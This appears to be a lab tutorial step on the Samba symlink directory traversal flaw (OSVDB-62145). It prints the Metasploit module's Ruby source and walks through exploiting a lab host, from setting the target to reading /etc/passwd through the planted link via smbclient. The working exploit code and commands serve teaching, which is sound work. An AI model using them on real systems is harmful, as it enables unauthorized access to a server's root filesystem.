Analyze the Samba Vulnerability
In this step, you will learn about the Samba vulnerability and analyze the core code of the exploit module.
Samba is free software that allows UNIX-like operating systems to connect with the SMB/CIFS (Server Message Block/Common Internet File System) network protocol used by Microsoft Windows. Version 3 not only allows access and sharing of SMB folders and printers but can also integrate into a Windows Server domain as a Domain Controller or join an Active Directory as a member. In simpler terms, this software bridges the gap between Windows and UNIX-like operating systems, enabling resource sharing between the two.
Samba has a wide range of applications, and therefore, vulnerabilities in Samba can have a significant impact. Samba can create network shares for selected Unix directories (including all subdirectories). This feature allows Windows users to access these Unix directories over the network, just like accessing regular Windows folders.
The vulnerability index used in this experiment is:
OSVDB-62145
The source code index for the samba module used in this experiment is:
symlink_traversal.rb
Let's go through the core code explanation:
## Module initialization information, including author information and module introduction
def initialize
super(
'Name' => 'Samba Symlink Directory Traversal',
'Description' => %Q{
This module exploits a directory traversal flaw in the Samba
CIFS server. To exploit this flaw, a writeable share must be specified.
The newly created directory will link to the root filesystem.
},
'Author' =>
[
'kcope', ## http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html
'hdm' ## metasploit module
],
'References' =>
[
['OSVDB', '62145'],
['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
],
'License' => MSF_LICENSE
)
## Register option information
register_options([
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']),
OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])
], self.class)
end
## Main execution function
def run
## Function to connect to the server
print_status("Connecting to the server...")
connect()
smb_login()
## Connect to the target host
print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...")
self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")
## Attempt to enter the root filesystem
print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")
self.simple.client.symlink(datastore['SMBTARGET'], "../" * 10)
## Print success message after successful entry
print_status("Now access the following share to browse the root filesystem:")
print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
print_line("")
end
end
After explaining the core code of the module, let's perform the actual exploitation in the MSF terminal by entering the following commands:
search samba
use auxiliary/admin/smb/samba_symlink_traversal
show options
Set the target host:
set RHOST 192.168.122.102
Select the shared directory:
set SMBSHARE tmp
Note: As a reminder, the impact of this Samba vulnerability is that it allows the creation of network shares for selected Unix directories (including all subdirectories).
After setting all the required parameters, you can proceed with exploiting the vulnerability:
exploit
If successful, you should see the following message:
[*] 192.168.122.102:445 - Now access the following share to browse the root filesystem:
After successful exploitation, exit with the exit
command, and test if you can connect using smbclient
in the terminal. You will be prompted for a password, but you can press Enter without entering any password:
exit
smbclient //192.168.122.102/tmp
Once connected, you can verify access to the root filesystem by executing the following command:
more rootfs/etc/passwd
You should see output similar to:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
[....]
This confirms that you have successfully exploited the vulnerability and gained access to the target host through the created network share.
Press Ctrl+D to quit the Metasploit console then start the inspection